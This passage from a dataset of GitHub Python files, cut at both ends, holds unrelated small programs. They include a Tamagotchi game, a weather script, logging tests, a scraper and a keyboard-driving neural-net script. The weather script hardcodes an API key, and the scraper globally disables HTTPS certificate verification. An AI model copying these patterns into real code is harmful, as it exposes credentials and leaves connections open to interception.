γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[2] = output[i + 1]\n","repo_name":"meyer-lab/tHMM","sub_path":"lineage/states/StateDistributionGamma.py","file_name":"StateDistributionGamma.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"35084872394","text":"import tkinter as tk\n\nclass Tamagotchi:\n name = \"\"\n state = 0 # TAMAGOTCHI STATE\n\ndef startGame():\n print(\"Iniciando el juego\")\n tamagotchi.state = 0\n etiquetaEstado.configure(text=(\"Estado: {0}\".format(estados[tamagotchi.state])))\n actualizarCuadricula(15,10)\n\ndef accion(numeroAccion):\n print(\"Acción {0}\".format(numeroAccion))\n tamagotchi.state = maquina[tamagotchi.state][numeroAccion]\n etiquetaEstado.configure(text=(\"Estado: {0}\".format(estados[tamagotchi.state])))\n actualizarCuadricula(15,10)\n #cuadricula = nuevaCuadricula(15, 10, 170, 70)\n\ndef actualizarCuadricula(numeroX, numeroY):\n #print(cuadricula)\n for y in range(numeroY):\n for x in range(numeroX):\n if personaje[y][x] != 9:\n colorTemporal = tamagotchi.state\n else :\n colorTemporal = 9\n cuadricula[y][x].configure(bg=colores[colorTemporal])\n\n\n\ndef nuevaCuadricula(numeroX, numeroY, posX, posY):\n\n posX = posX\n posY = posY\n\n cuadricula = []\n\n for y in range(numeroY):\n fila = []\n for x in range(numeroX):\n if personaje[y][x] != 9:\n colorTemporal = tamagotchi.state\n else :\n colorTemporal = 9\n temporal = tk.Label(root, text=\"\", width=2, height=1, bg=colores[colorTemporal])\n temporal.place(x=(posX + x*25), y=(posY + y*25))\n fila.append(temporal)\n cuadricula.append(fila)\n\n\n return cuadricula\n\n\n\nheigh = 500\nwidth = 700\n\ncolores = [\"#ffffff\", \"#f5b5c8\", \"#c92d39\", \"#ef8d22\", \"#ffdf71\", \"#5abaa7\", \"#3aa6dd\", \"#834187\", \"#999\",\"#000\", ]\nestados = [\"Recién Nacido\", \"Cariñoso\", \"Enojado\", \"Nervioso\", \"Asustado\", \"Feliz\", \"Tranquilo\", \"Enfermo\", \"Triste\",\"Muerto\", ]\n\n#[0] - FEED\n#[1] - PET\n#[2] - HIT\n#[3] - PLAY\n#[4] - PUNISH\n#[5] - SCARE\n#[6] - WALK\n#[7] - BATHE\n#[8] - INJECT\n#[9] - KILL\n\nmaquina = [\n [5, 1, 4, 5, 8, 4, 5, 5, 7, 9], #[0]NEWBORN\n [5, 1, 4, 1, 8, 3, 5, 6, 7, 9], #[1]AFFECTIONATE\n [7, 6, 7, 3, 7, 7, 6, 6, 7, 9], #[2]ANGRY\n [2, 6, 2, 6, 4, 4, 6, 6, 7, 9], #[3]NERVOUS\n [7, 6, 8, 6, 4, 4, 6, 6, 7, 9], #[4]SCARED\n [5, 1, 8, 5, 3, 3, 5, 6, 7, 9], #[5]HAPPY\n [5, 1, 3, 5, 8, 4, 5, 6, 7, 9], #[6]CALM\n [7, 7, 9, 7, 9, 9, 7, 3, 6, 9], #[7]SICK\n [6, 5, 9, 6, 9, 3, 5, 6, 7, 9], #[8]SAD\n [9, 9, 9, 9, 9, 9, 9, 9, 9, 9], #[9]DEAD\n ]\n\npersonaje = [\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n [9,9,9,9,0,9,9,9,9,9,0,9,9,9,9],\n [9,9,9,9,9,0,9,9,9,0,9,9,9,9,9],\n [9,9,9,9,0,0,0,0,0,0,0,9,9,9,9],\n [9,9,9,0,0,9,0,0,0,9,0,0,9,9,9],\n [9,9,0,0,0,0,0,0,0,0,0,0,0,9,9],\n [9,9,0,9,0,0,0,0,0,0,0,9,0,9,9],\n [9,0,9,9,0,9,9,9,9,9,0,9,9,0,9],\n [9,9,9,9,0,0,9,9,9,0,0,9,9,9,9],\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n ]\n\n\nroot = tk.Tk()\nroot.config(width=width, height=heigh, bg='white')\n\nstartButton = tk.Button(root, text=\"Reiniciar el juego\",\n command=lambda: startGame())\nstartButton.place(x=(width/2-45), y=25)\n\n# The tamagotchi is born\nprint(\"Nacimiento de tamagochi\")\ntamagotchi = 
Tamagotchi()\ntamagotchi.name = \"Jamón\"\ntamagotchi.state = 0 # State [0] = newborn\n\n\ncuadricula = nuevaCuadricula(15, 10, 170, 70)\n\n# Action buttons\n\netiquetaEstado = tk.Label(root, text=(\"Estado: {0}\".format(estados[tamagotchi.state])), width=20, height=1, bg=colores[tamagotchi.state], fg='#000')\netiquetaEstado.place(x=100, y=50)\n\n\naccion1 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ALIMENTAR\",\n command=lambda: accion(0))\naccion1.place(x=135, y=350)\n\naccion2 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ACARICIAR\",\n command=lambda: accion(1))\naccion2.place(x=225, y=350)\n\naccion3 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"GOLPEAR\",\n command=lambda: accion(2))\naccion3.place(x=315, y=350)\n\naccion4 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"JUGAR\",\n command=lambda: accion(3))\naccion4.place(x=405, y=350)\n\naccion5 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"CASTIGAR\",\n command=lambda: accion(4))\naccion5.place(x=495, y=350)\n\naccion6 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ASUSTAR\",\n command=lambda: accion(5))\naccion6.place(x=135, y=400)\n\naccion7 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"PASEAR\",\n command=lambda: accion(6))\naccion7.place(x=225, y=400)\n\naccion8 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"BAÑAR\",\n command=lambda: accion(7))\naccion8.place(x=315, y=400)\n\naccion9 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"INYECTAR\",\n command=lambda: accion(8))\naccion9.place(x=405, y=400)\n\naccion10 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"MATAR\",\n command=lambda: accion(9))\naccion10.place(x=495, y=400)\n\n\nroot.mainloop()\nprint(tamagotchi.name)\n","repo_name":"Zurol/UAD-IntroduccionProgramacion","sub_path":"tamagotchi.py","file_name":"tamagotchi.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28680781388","text":"#!/Users/sdaniels/.pyenv/shims/python3\nimport sys\nimport requests\n\n#http://api.weatherapi.com/v1/current.json?key=98acecba0026494aa06204227210412&q=Austin&aqi=no\n\nWEATHER_API_KEY = \"98acecba0026494aa06204227210412\"\n\nuser_input = input(\"Choose city:\\n1: Austin\\n2: Chicago\\n3: Tampa\\n\")\n\ncity = None\n\nif user_input == \"1\":\n\tcity = \"Austin\"\nelif user_input == \"2\":\n\tcity = \"Chicago\"\nelif user_input == \"3\":\n\tcity = \"Tampa\"\nelse:\n\tprint(\"Not a valid selection.\")\n\tsys.exit(1)\n\nprint(\"You selected \" + city)\n\nurl = \"http://api.weatherapi.com/v1/current.json?key=%s&q=%s&aqi=no\"%(WEATHER_API_KEY, city)\nresponse = requests.get(url=url)\n\nweather_dictionary = response.json()\n\ntemp = weather_dictionary[\"current\"][\"temp_f\"]\nwind = weather_dictionary[\"current\"][\"wind_mph\"]\nfeels = weather_dictionary[\"current\"][\"feelslike_f\"]\nprint(\"The temperature in %s is %s F\"%(city, temp))\nprint(\"The wind in %s is %s mph\"%(city, wind))\nprint(\"Feels like the temperature in %s is %s F\"%(city, feels))\n#Number2\n#I see some new changes.\n","repo_name":"notsure44/brian-repo","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17760578333","text":"import json\nimport pathlib\nfrom datetime import datetime, timedelta, timezone\nfrom typing import Any\n\nfrom .models import point_name\nfrom .wbgt_util import wbgt_status\n\n\nclass wbgt_point:\n def __init__(\n self,\n ido: float,\n keido: float,\n month: int,\n day: int,\n hour: int,\n severity: int,\n type: str = \"Feature\",\n ) -> None:\n self.type: str = type\n self.geometry: dict[str, Any] = {\"type\": \"Point\", \"coordinates\": (keido, ido)}\n self.properties: dict[str, Any] = {\"Month\": month, \"Day\": day, \"Hour\": hour, \"severity\": severity}\n\n\nclass com_geojson:\n def __init__(self, type: str = \"FeatureCollection\"):\n self.type = type\n self.features: list[dict[str, Any]] = []\n\n\n# jp = json.dumps(p.__dict__)\n# print(jp)\n\n\ndef data2geojson(file_name: str = \"info.geojson\", force: bool = False):\n target = pathlib.Path(__file__).parent / \"static\" / file_name\n\n date: int = datetime.now(timezone(timedelta(hours=9), \"JST\")).day\n\n if force or not target.exists():\n print(\"Generate GeoJson\")\n\n g = com_geojson()\n\n for point in point_name.objects.all():\n try:\n for time, wbgt in zip(point.wbgt_time_json[\"time\"], point.wbgt_time_json[\"wbgt\"]):\n month, day, hour = time.split(\"/\")\n\n for v in wbgt_status.values():\n if v.min <= wbgt < v.max:\n severity = v.level\n break\n else:\n severity = 0\n\n g.features.append(\n wbgt_point(\n ido=point.ido,\n keido=point.keido,\n month=int(month),\n day=int(day),\n hour=int(hour.split(\":\")[0]) + 24 * (date != int(day)),\n severity=severity,\n ).__dict__\n )\n except TypeError:\n pass\n\n with open(target, mode=\"w+\") as f:\n\n json.dump(g.__dict__, f)\n","repo_name":"tsfmDevTeam/TemperatureSenseForecastMap","sub_path":"app/db2geojson.py","file_name":"db2geojson.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603976489","text":"import logging\nfrom unittest import TestCase\n\nfrom runlog import CancelLog, RunLogger\n\n\nclass RunloggerTests(TestCase):\n\n def setUp(self):\n self.rl = RunLogger(redis_config={'db': 3}, max_logs=4)\n self.rl._redis.flushdb()\n\n def log_all_the_things(self):\n self.rl.debug(\"DEBUG\")\n self.rl.info(\"INFO\")\n self.rl.warn(\"WARN\")\n self.rl.warning(\"WARNING\")\n self.rl.error(\"ERROR\")\n self.rl.critical(\"CRITICAL\")\n try:\n raise Exception(\"Exception!\")\n except Exception as ex:\n self.rl.exception(ex)\n\n def test_no_logs_outside_of_context_manager(self):\n self.log_all_the_things()\n self.assertEqual(self.rl.list_jobs(), [])\n\n def test_log_a_job(self):\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 1)\n run_id = self.rl.list_runs('foo')[0].decode()\n log = self.rl.get_log('foo', run_id)\n self.assertEqual(len(log), 7)\n self.assertEqual(log[:6], [b'DEBUG',\n b'INFO',\n b'WARN',\n b'WARNING',\n b'ERROR',\n b'CRITICAL'])\n self.assertTrue(log[6].startswith(b'Exception!\\n'))\n start, end = self.rl.run_times('foo', run_id)\n self.assertTrue(0 < float(end) - float(start) < 1)\n\n def test_log_a_job_that_blows_up(self):\n\n def log_blows_up():\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n raise Exception(\"Kaboom!\")\n\n self.assertRaises(Exception, log_blows_up)\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n 
self.assertEqual(len(self.rl.list_runs('foo')), 1)\n log = self.rl.get_log('foo', self.rl.list_runs('foo')[0].decode())\n self.assertEqual(len(log), 8)\n self.assertEqual(log[:6], [b'DEBUG',\n b'INFO',\n b'WARN',\n b'WARNING',\n b'ERROR',\n b'CRITICAL'])\n self.assertTrue(log[6].startswith(b'Exception!\\n'))\n self.assertTrue(log[7].startswith(b'Kaboom!\\n'))\n\n def test_log_already_running(self):\n\n def log_already_running():\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n with self.rl.runlog('bar') as logger:\n self.log_all_the_things()\n\n self.assertRaises(Exception, log_already_running)\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 1)\n log = self.rl.get_log('foo', self.rl.list_runs('foo')[0].decode())\n self.assertEqual(len(log), 1)\n self.assertTrue(log[0].startswith(b\"Can't start bar.\"))\n\n def test_log_cancel(self):\n\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n raise CancelLog\n\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 0)\n\n def test_max_logs(self):\n\n for _ in range(5):\n with self.rl.runlog('foo') as logger:\n logger.setLevel(logging.DEBUG)\n self.log_all_the_things()\n\n self.assertEqual(self.rl.list_jobs(), [b'foo'])\n self.assertEqual(len(self.rl.list_runs('foo')), 4)\n","repo_name":"lukearno/runlog","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"13301050596","text":"\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def numberOfSubarrays(self, nums: List[int], k: int) -> int:\n \n for i in range(len(nums)):\n nums[i]= 1 if (nums[i]%2 != 0) else 0\n \n prefixSum , count = 0,0\n dic = defaultdict(int)\n \n for i in range(len(nums)):\n prefixSum += nums[i]\n \n if prefixSum ==k:\n count +=1\n if prefixSum-k in dic:\n count += dic[prefixSum-k]\n # count occurrences of this prefix sum\n dic[prefixSum] = dic.get(prefixSum, 0) + 1\n return count\n \n \n \n ","repo_name":"oumburs9/Competitive-Programming","sub_path":"Leet Code Problems/Medium problems/#1248 Count Number of Nice Subarrays -medium.py","file_name":"#1248 Count Number of Nice Subarrays -medium.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5110269643","text":"import numpy as np\nfrom grabScreen import grab_screen\nfrom getKeys import Check_pressed\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\n\nimport cv2\nimport time\nimport keyboard\n\n\n\n\n\nmodel = load_model('C:/Users/bytes 2.0/Desktop/Projects/drivingModel4')\n\n\ndef forward():\n keyboard.press('i')\n keyboard.release('j')\n keyboard.release('k')\n keyboard.release('l')\n \ndef forward_left():\n keyboard.press('i')\n keyboard.press('j')\n keyboard.release('k')\n keyboard.release('l')\n\ndef forward_right():\n keyboard.press('i')\n keyboard.press('l')\n keyboard.release('j')\n keyboard.release('k')\n\n\ndef left():\n keyboard.press('j')\n keyboard.release('l')\n keyboard.release('k')\n keyboard.release('i')\n\ndef right():\n keyboard.press('l')\n keyboard.release('j')\n keyboard.release('k')\n keyboard.release('i')\n\ndef backwards():\n keyboard.press('k')\n keyboard.release('j')\n keyboard.release('l')\n keyboard.release('i')\n\n\n\n\ndef main():\n for i in 
range(0,5):\n print(i+1)\n time.sleep(1)\n \n stopped = True\n while True:\n \n if not stopped:\n screen = grab_screen(region=(0,317,790,600))\n screen = cv2.resize(screen, (200,150))\n screen = cv2.cvtColor(screen, cv2.COLOR_BGR2GRAY)\n \n prediction = model.predict([screen.reshape(-1,150,200,1)])[0]\n moves = list(np.around(prediction))\n print(moves)\n \n if moves == [1,0,0,0,0,0,0]:\n forward()\n elif moves == [0,1,0,0,0,0,0]:\n right()\n elif moves == [0,0,1,0,0,0,0]:\n backwards()\n elif moves == [0,0,0,1,0,0,0]:\n left()\n elif moves == [0,0,0,0,0,1,0]:\n forward_left()\n elif moves == [0,0,0,0,0,0,1]:\n forward_right()\n \n \n keys = Check_pressed()\n \n if 'T' in keys:\n if stopped == True:\n stopped = False\n time.sleep(1)\n else:\n stopped = True\n keyboard.release('k')\n keyboard.release('j')\n keyboard.release('l')\n keyboard.release('i')\n time.sleep(1)\n \n \n \nif __name__ == \"__main__\":\n main()","repo_name":"404dn/Self-Driving-NN","sub_path":"Self-Driving-NeuralNetwork/source/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3376454413","text":"\"\"\"\nfetch_data module\n15 November 2018\n\"\"\"\n\n\n#extract data from website\nimport os, ssl\nif (not os.environ.get('PYTHONHTTPSVERIFY', '') and\n getattr(ssl, '_create_unverified_context', None)): \n ssl._create_default_https_context = ssl._create_unverified_context\n\nimport urllib2\nfrom bs4 import BeautifulSoup\n\ndef get_data(source):\n\n\treq = urllib2.Request(source)\n\tresponse = urllib2.urlopen(req)\n\n\ttext = response.read()\n\n\tresponse.close()\n\n\ttext = BeautifulSoup(text, \"html.parser\").get_text(strip=True)\n\n\treturn text\n\n\n","repo_name":"jusco84/first-python-proj","sub_path":"markov_chain/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5745031634","text":"from openpyxl import load_workbook\nimport re\n\n\nexcel_file2 = 'Book2_test.xlsx'\nwb2 = load_workbook(excel_file2) # book_1\nws2 = wb2[\"Sheet1\"] # sh_1\n\n\nws = wb2.active \nmaxValue=9643\n\ndef wordfinder(searchData):\n for i in range(1, ws.max_row + 1):\n \n for j in range(2, ws.max_column + 1):\n if j != 2:\n pass\n elif searchData == ws.cell(i,j).value:\n print(\"Encontrado: \",(ws.cell(i,j)).value )\n print(ws.cell(i,j))\n print(wb2.sheetnames) \n\n\n\n\nwordfinder(maxValue)\n\nlistamayor=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]\nprint(listamayor)\n\n\nfor x in listamayor:\n if 263 == x:\n print(\"Encontre al 26\")\n\n\n","repo_name":"Abisoft77/buscarValorExcel","sub_path":"buscar.py","file_name":"buscar.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13810601266","text":"import os\nimport sys\nimport txconfig\n\nfrom txconfig import TX_ROOT\n\nsys.path = sys.path + [os.path.join(TX_ROOT, 'tools')]\nfrom building import *\n\nTARGET = 'threadx.' 
+ txconfig.TARGET_EXT\n\nenv = Environment(tools = ['mingw'],\n AS = txconfig.AS, ASFLAGS = txconfig.AFLAGS,\n CC = txconfig.CC, CCFLAGS = txconfig.CFLAGS,\n CXX = txconfig.CC, CXXFLAGS = txconfig.CXXFLAGS,\n AR = txconfig.AR, ARFLAGS = '-rc',\n LINK = txconfig.LINK, LINKFLAGS = txconfig.LFLAGS)\nenv.PrependENVPath('PATH', txconfig.EXEC_PATH)\n\nExport('TX_ROOT')\nExport('txconfig')\n\n# prepare building environment\nobjs = PrepareBuilding(env, TX_ROOT, has_libcpu=True)\n\n# include Packages\n#if os.getenv('PKG_ROOT'):\n# PKG_ROOT = os.getenv('PKG_ROOT')\n# objs.extend(SConscript(os.path.join(PKG_ROOT, 'SConscript')))\n \n# make a building\nDoBuilding(TARGET, objs)\n","repo_name":"yygg/threadx-platform","sub_path":"bsp/Nuvoton/NUC029/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"86583648772","text":"#!/usr/bin/env python3\n\nfrom rctf import golf\nimport os\n\nrate = 1 / 12\nbase = 1\n\nprint(golf.calculate_limit(\n 'https://staging.redpwn.net/' if os.environ.get('DEBUG') else 'https://2020.redpwn.net/',\n 'kevin-higgs', # challenge id\n 1592769600, # CTF start date\n lambda hours : int(base + (hours * rate))\n))\n","repo_name":"redpwn/redpwnctf-2020-challenges","sub_path":"pwn/kevin-higgs/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"75221267688","text":"import numpy, random, math\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\ndef creatraindata(amount):\n temp = []\n for i in range(amount):\n temp.append([random.randint(0, 500), random.randint(0, 500), random.randint(0, 500), random.randint(0, 500)])\n return temp\n\ndef getclosest(inputs):\n distance = 1000\n maxdist = 10\n x, y, tx, ty = inputs\n while distance > maxdist:\n angle = random.randint(-90,90)\n power = random.randint(0,100)\n distance = simulatebullet(angle, power, (x, y), (tx, ty))\n \n return [power, angle]\n\ndef simulatebullet(angle, power, selfpos, enemypos):\n bulletx, bullety = selfpos\n bulletmx = math.sin(math.radians(angle))*power/2\n bulletmy = math.cos(math.radians(angle))*power/2\n alive = True\n \n while alive:\n bulletx = bulletx + bulletmx/5\n bullety = bullety + bulletmy/5\n bulletmy = bulletmy - 1/5\n if bulletx > 1000 or bulletx < 0 or bullety < 0:\n alive = 0\n elif bulletmy < 0 and bullety < enemypos[1]:\n alive = 0\n\n offsetx = bulletx - enemypos[0]\n offsety = bullety - enemypos[1]\n return(math.sqrt(math.pow(offsetx, 2) + math.pow(offsety, 2)))\n\n\ndef generatetrainigdata(amount):\n tempin = creatraindata(amount)\n tempout = []\n for i, data in enumerate(tempin):\n if i % 10 == 0:\n print(str(int(i/amount*100)) + '%')\n powerraw, angleraw = getclosest(data)\n power = powerraw/100\n angle = (angleraw + 90)/180\n tempout.append([power, angle])\n\n return tempin, tempout\n\nprint(\"creating test data\")\ninputs, outputs = generatetrainigdata(10000)\n\nnumpyinput = numpy.array(inputs)\nnumpyoutput = numpy.array(outputs)\n\nprint(\"building model\")\nmodel = Sequential()\nmodel.add(Dense(4, 
input_shape=(4,)))\nmodel.add(Activation('relu'))\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dense(32))\nmodel.add(Activation('relu'))\nmodel.add(Dense(8))\nmodel.add(Activation('relu'))\nmodel.add(Dense(2))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(optimizer='sgd', loss='mse', metrics=['acc'])\n\nprint(\"training\")\nmodel.fit(numpyinput, numpyoutput, epochs=150, batch_size=10)\n\nprint(model.evaluate(numpyinput, numpyoutput))\nmodel.save(\"model.h5\")","repo_name":"jaxarthur/tankgamepython","sub_path":"src/resources/NN/aiming/trainaiming.py","file_name":"trainaiming.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151171684","text":"import connection\nfrom crud.wh_sched import WarehouseSchedules\nfrom crud.errors import summarize_error\nfrom typing import Optional, List, Tuple\nimport datetime\n\n\ndef create_callback(data, row, **additions):\n if row is None:\n row = WarehouseSchedules.construct(\n name=\"__empty__placeholder__\",\n size=\"X-Small\",\n suspend_minutes=0,\n resume=True,\n scale_min=1,\n scale_max=1,\n warehouse_mode=\"\",\n )\n for k, v in additions.items():\n setattr(row, k, v)\n return (row, data)\n\n\ndef populate_initial(warehouse):\n # WarehouseSchedules.create_table(connection.Connection.get())\n warehouses = WarehouseSchedules.batch_read(connection.Connection.get(), \"start_at\")\n if any(i for i in warehouses if i.name == warehouse) == 0:\n wh = describe_warehouse(warehouse)\n wh.write(connection.Connection.get())\n warehouses.append(wh)\n wh2 = describe_warehouse(warehouse)\n wh2.weekday = False\n wh2.write(connection.Connection.get())\n warehouses.append(wh2)\n return warehouses\n\n\ndef describe_warehouse(warehouse):\n wh_df = connection.execute(f\"show warehouses like '{warehouse}'\")\n wh_dict = wh_df.T[0].to_dict()\n return WarehouseSchedules(\n name=warehouse,\n size=wh_dict[\"size\"],\n suspend_minutes=int(wh_dict[\"auto_suspend\"] or 0) // 60,\n resume=wh_dict[\"auto_resume\"],\n scale_min=wh_dict.get(\"min_cluster_count\", 0),\n scale_max=wh_dict.get(\"max_cluster_count\", 0),\n warehouse_mode=wh_dict.get(\"scaling_policy\", \"Standard\"),\n )\n\n\ndef convert_time_str(time_str) -> datetime.time:\n return datetime.datetime.strptime(time_str, \"%I:%M %p\").time()\n\n\ndef verify_and_clean(\n data: List[WarehouseSchedules], ignore_errors=False\n) -> Tuple[Optional[str], List[WarehouseSchedules]]:\n if data[0].start_at != datetime.time(0, 0):\n if ignore_errors:\n data[0].start_at = datetime.time(0, 0)\n data[0]._dirty = True\n else:\n return \"First row must start at midnight.\", data\n if data[-1].finish_at != datetime.time(23, 59):\n if ignore_errors:\n data[-1].finish_at = datetime.time(23, 59)\n data[0]._dirty = True\n else:\n return \"Last row must end at midnight.\", data\n next_start = data[0]\n for row in data[1:]:\n if row.start_at != next_start.finish_at:\n next_start.finish_at = row.start_at\n next_start._dirty = True\n if row.warehouse_mode == \"Inherit\":\n row.warehouse_mode = next_start.warehouse_mode\n row._dirty = True\n next_start = row\n try:\n [i.validate(i.dict()) for i in data]\n except Exception as e:\n return summarize_error(\"Verify failed\", e), data\n return None, [i for i in data if i._dirty]\n\n\ndef flip_enabled(wh_name: str):\n connection.execute(\n f\"update internal.{WarehouseSchedules.table_name} set enabled = not enabled where name 
= '{wh_name}'\"\n )\n\n\ndef time_filter(\n max_finish: datetime.time, min_start: datetime.time, is_start: bool\n) -> List[str]:\n hours = [12] + list(range(1, 12))\n minutes = list(range(0, 60, 15))\n ampm = [\"AM\", \"PM\"]\n times = [f\"{h:02}:{m:02} {a}\" for a in ampm for h in hours for m in minutes]\n base_times = times + [\"11:59 PM\"]\n if is_start:\n return [\n i\n for i in base_times\n if convert_time_str(i) > min_start and convert_time_str(i) < max_finish\n ]\n else:\n return base_times\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/ui/warehouse_utils.py","file_name":"warehouse_utils.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"42297494071","text":"from script.point import Point\nfrom script.plot import plot\nfrom settings import square_size, point_count\n\n\ndef main():\n Point.create_points(point_count)\n square = Point.most_concentration(square_size)\n first = Point.first_point(Point.close_points_list)\n connected_points = Point.closest_point(first)\n print(\"Balance =\", Point.budget * 1000)\n x, y = Point.points_x_y()\n plot(x, y, square, connected_points)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlphazCode/Practice_Railroad_Tycoon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18541340174","text":"import re\nfrom urllib.parse import urlparse, parse_qs\nfrom urllib.parse import ParseResult\nfrom logging import Logger,LoggerAdapter\n\n\nclass PaginationCheck():\n\n # ページネーションで追加済みのurlリスト\n pagination_selected_urls: set[str] = set()\n\n def check(self, link_url: str, crawl_target_urls: list, logger: LoggerAdapter, spider_name: str) -> bool:\n '''\n チェックしたいurl(link_url)に対して、既にクロール対象となったurl(crawl_target_urls)の別ページかチェックを行う。\n '''\n check_flg: bool = False # ページネーションのリンクの場合、Trueとする。\n # チェック対象のurlを解析\n link_parse: ParseResult = urlparse(link_url)\n # 解析したクエリーをdictへ変換 page=2&a=1&b=2 -> {'page': ['2'], 'a': ['1'], 'b': ['2']}\n link_query: dict = parse_qs(link_parse.query)\n\n # 追加リクエスト済み情報の準備\n pagination_selected_pathes: set = set()\n pagination_selected_same_path_queries: list = []\n for pagination_selected_url in self.pagination_selected_urls:\n _ = urlparse(pagination_selected_url)\n pagination_selected_pathes.add(_.path)\n if link_parse.path == _.path:\n pagination_selected_same_path_queries.append(parse_qs(_.query))\n\n # sitemapから取得したurlより順にチェック\n for _ in crawl_target_urls:\n # sitemapから取得したurlを解析\n crawl_target_parse: ParseResult = urlparse(_)\n # netloc(hostnameだけでなくportも含む)が一致すること\n if crawl_target_parse.netloc == link_parse.netloc:\n # まだ同一ページの追加リクエストされていない場合(path部分で判定)\n if not link_parse.path in pagination_selected_pathes:\n # パスの末尾にページが付与されているケースの場合、追加リクエストの対象とする。\n # 例)https://www.sankei.com/article/20210321-VW5B7JJG7JKCBG5J6REEW6ZTBM/\n # https://www.sankei.com/article/20210321-VW5B7JJG7JKCBG5J6REEW6ZTBM/2/\n _ = re.compile(r'/[0-9]{1,3}/*$')\n if re.search(_, link_parse.path):\n # pathの末尾のページ情報を削除\n # 例)〜OYT1T50226/2/ -> 〜OYT1T50226\n link_type1 = _.sub('', link_parse.path)\n # 末尾のスラッシュがあれば削除\n _ = re.compile(r'/$')\n crawl_type1 = _.sub('', crawl_target_parse.path)\n # ページ情報部を除いて比較し一致した場合\n if crawl_type1 == link_type1:\n logger.info(\n f'=== {spider_name} ページネーション(type1) : {link_url}')\n check_flg = True\n\n # 拡張子除去後の末尾にページが付与されているケースの場合、追加リクエストの対象とする。\n # 
